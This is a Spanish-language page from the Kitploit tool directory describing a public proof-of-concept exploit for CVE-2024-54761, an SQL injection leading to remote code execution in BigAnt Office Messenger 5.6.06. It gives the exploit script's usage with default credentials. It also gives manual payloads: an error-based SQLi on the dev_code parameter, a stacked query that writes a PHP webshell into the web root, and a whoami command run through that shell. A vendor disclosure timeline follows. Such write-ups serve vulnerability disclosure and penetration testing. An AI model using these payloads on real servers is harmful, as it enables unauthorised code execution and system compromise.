Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-54761 — CVE-2024-54761 PoC | Kitploit
Herramientas/GitHubGitHub/nscan9/cve-2024-54761
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubnscan9/cve-2024-54761

CVE-2024-54761

CVE-2024-54761 PoC

Ver Repositorio
1hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

BigAnt Office Messenger 5.6.06 RCE mediante inyección SQL

La vulnerabilidad de inyección SQL en BigAnt Messenger provoca una vulnerabilidad RCE. Siga los pasos para explotarla.

Uso:

root@kitploit:~
CVE-2024-54761.py [-h] -r RHOST [-p RPORT] [-u USERNAME] [-P PASSWORD]
options:
  -h, --help            show this help message and exit
  -r, --rhost RHOST     Target IP address
  -p, --rport RPORT     Target port (default 8000)
  -u, --username USERNAME
                        Login username (default admin)
  -P, --password PASSWORD
                        Login password (default 123456)

Ejecute el exploit con las credenciales por defecto.

root@kitploit:~
python CVE-2024-54761.py -r 127.0.0.1
exploit

Explotación manual

Extraiga la versión de la base de datos utilizada con el parámetro dev_code que está expuesto a SQLi.

root@kitploit:~
# Payload
?dev_code=AND EXTARCTVALUE(rand(),concat(CHAR(126),version(),CHAR(126)))--

versión de SQLI Suba una webshell PHP al objetivo mediante consultas apiladas SQL.

Descargar herramienta
root@kitploit:~
# Payload
?dev_code=;SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE 'C:/Program Files (x86)/BigAntSoft/IM Console/im_webserver/htdocs/shell.php'-- -

crear webshell 1 Prueba de ejecución de comandos:

root@kitploit:~
/shell.php?cmd=whoami

whoami comando dir

Cronología

31-10-2024: Vulnerabilidades enviadas al proveedor por correo electrónico

31-10-2024: Correo enviado al proveedor, sin respuesta

15-11-2024: Correo enviado al proveedor, sin respuesta

15-11-2024: Solicitud de CVEs

Referencia

https://gist.github.com/nscan9/a31982c90ab40a8e00373bf15efbf52a
https://www.bigantsoft.com